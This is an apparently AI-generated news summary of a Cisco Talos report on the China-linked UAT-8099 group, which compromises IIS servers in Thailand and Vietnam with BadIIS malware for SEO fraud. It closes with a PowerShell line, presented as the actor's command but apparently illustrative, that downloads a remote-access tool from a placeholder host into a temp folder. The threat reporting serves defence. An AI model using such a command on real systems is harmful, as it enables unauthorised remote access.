China-Linked UAT-8099 Targets IIS Servers in Asia with BadIIS SEO Malware
These articles are AI-generated summaries. Please check the original sources for full details.
China-Linked UAT-8099 Targets IIS Servers in Asia with BadIIS SEO Malware
The China-linked threat actor UAT-8099 has been attributed to a new campaign targeting vulnerable Internet Information Services (IIS) servers across Asia, with a specific focus on Thailand and Vietnam, using the BadIIS malware for regional SEO fraud. The campaign, discovered by Cisco Talos, involves exploiting IIS servers to facilitate search engine optimization (SEO) fraud, with the scale of the campaign currently unknown.
Why This Matters
The technical reality of the UAT-8099 campaign highlights the gap between ideal security models and real-world vulnerabilities, with the threat actor exploiting weak settings in web server file upload features and security vulnerabilities to gain initial access to IIS servers. The campaign’s focus on regional SEO fraud, targeting specific countries and languages, demonstrates the evolving nature of cyber threats and the need for tailored security measures, with potential costs including compromised server integrity and reputational damage.
Key Insights
- UAT-8099 uses web shells and PowerShell to execute scripts and deploy the GotoHTTP tool, granting remote access to vulnerable IIS servers (Cisco Talos, 2026).
- The BadIIS malware is customized to target specific regions, with variants such as BadIIS IISHijack and BadIIS asdSearchEngine targeting victims in Vietnam and Thailand, respectively (Cisco Talos, 2026).
- The threat actor leverages legitimate tools, such as SoftEther VPN and EasyTier, to control compromised IIS servers and evade detection (Cisco Talos, 2026).
Working Example
# Example of PowerShell command used to deploy GotoHTTP tool
powershell -Command "Invoke-WebRequest -Uri https://example.com/GotoHTTP.exe -OutFile C:\Windows\Temp\GotoHTTP.exe"Practical Applications
- Use Case: Companies with IIS servers in Asia, particularly in Thailand and Vietnam, should prioritize security updates and monitoring to prevent BadIIS malware infections.
- Pitfall: Failing to restrict file upload features and neglecting regular security audits can lead to exploitation by threat actors like UAT-8099, resulting in compromised server integrity and SEO fraud.
References:
Continue reading
Next article
Chinese APTs Hacking Asian Orgs With High-End Malware
Related Content
Malicious VSX Extension SleepyDuck Leverages Ethereum for Persistent Command Server Control
Researchers uncover SleepyDuck RAT hidden in a VSX extension, using Ethereum contracts to dynamically update its command-and-control server, highlighting risks in open-source software ecosystems.
Android Malware FvncBot, SeedSnatcher, and ClayRat Gain Stronger Data Theft Features
Researchers reveal advanced Android malware FvncBot, SeedSnatcher, and ClayRat with enhanced data theft capabilities, targeting banking and crypto users.
China-Linked UAT-7290 Targets Telecoms with Linux Malware and ORB Nodes
Cisco Talos identified China-linked UAT-7290 compromising telecoms since 2022 via Linux malware, exploits, and ORB infrastructure.